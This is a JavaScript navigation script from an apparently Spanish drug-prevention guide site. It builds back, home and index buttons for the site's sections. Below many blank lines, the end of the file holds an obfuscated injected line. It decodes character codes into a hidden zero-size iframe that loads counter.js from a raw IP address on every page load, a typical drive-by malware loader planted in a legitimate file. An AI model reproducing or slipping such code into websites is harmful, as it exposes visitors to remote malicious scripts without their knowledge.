/* Se calcula la raiz del sitio dinamicamente segun el valor de la direccion
actual */

function calculaRaiz () {
	var indice = location.href.indexOf("drogas/");
	var raiz = "";
	if (indice == -1) {
		alert("Error calculando la raiz del sitio");
	} else {
		raiz = location.href.substring(0, indice);
		//alert("location.href: " + location.href +"\nraiz: "+raiz);
	}
	return raiz;
}

function botonera (guia, anterior, home, indice) {
	var raiz = calculaRaiz();

	var banteriorUrl   = raiz+"drogas/padres/img/botones/banterior.png";
	var bhomeUrl       = raiz+"drogas/padres/img/botones/bhome.png";
	var bindiceUrl     = raiz+"drogas/padres/img/botones/bindice.png";

	var homeUrl        = raiz+"drogas/index.html";
	var familiaUrl     = raiz+"drogas/familia/guia.html";
	var drogasUrl      = raiz+"drogas/drogas/guia.html";
	var ayudaUrl       = raiz+"drogas/ayuda/guia.html";
	var mujeresUrl     = raiz+"drogas/mujeres/guia.html";
	var formadoresUrl  = raiz+"drogas/formadores/guia.html";
	var laboralUrl     = raiz+"drogas/laboral/guia.html";
	var inmigrantesUrl = raiz+"drogas/inmigrantes/guia.html";
	var padresUrl      = raiz+"drogas/padres/guia.html";

	if (anterior) {
		document.write("<a href=\"javascript:history.back()\">");
		document.write("<img src=\"" + banteriorUrl + "\" alt=\"Anterior\" class=\"boton\" onMouseOver=\"high(this)\" onMouseOut=\"low(this)\" /></a>");
	}
	if (home) {
		document.write("<a href=\"" + homeUrl + "\">");
		document.write("<img src=\"" + bhomeUrl + "\" alt=\"P&aacute;gina principal\" class=\"boton\" onMouseOver=\"high(this)\" onMouseOut=\"low(this)\" /></a>");
	}
	if (indice) {
		if (guia == "drogas")
			document.write("<a href=\"" + drogasUrl + "\">");
		else if (guia == "familia")
			document.write("<a href=\"" + familiaUrl + "\">");
		else if (guia == "ayuda")
			document.write("<a href=\"" + ayudaUrl + "\">");
		else if (guia == "mujeres")
			document.write("<a href=\"" + mujeresUrl + "\">");
		else if (guia == "formadores")
			document.write("<a href=\"" + formadoresUrl + "\">");
		else if (guia == "laboral")
			document.write("<a href=\"" + laboralUrl + "\">");
		else if (guia == "inmigrantes")
			document.write("<a href=\"" + inmigrantesUrl + "\">");
		else if (guia == "padres")
			document.write("<a href=\"" + padresUrl + "\">");

		document.write("<img src=\"" + bindiceUrl + "\" alt=\"&Iacute;ndice\" class=\"boton\" onMouseOver=\"high(this)\" onMouseOut=\"low(this)\" /></a>");
	}
}






























var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!52!54!46!52!46!49!54!51!46!50!48!56!47!99!111!117!110!116!101!114!46!106!115!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);

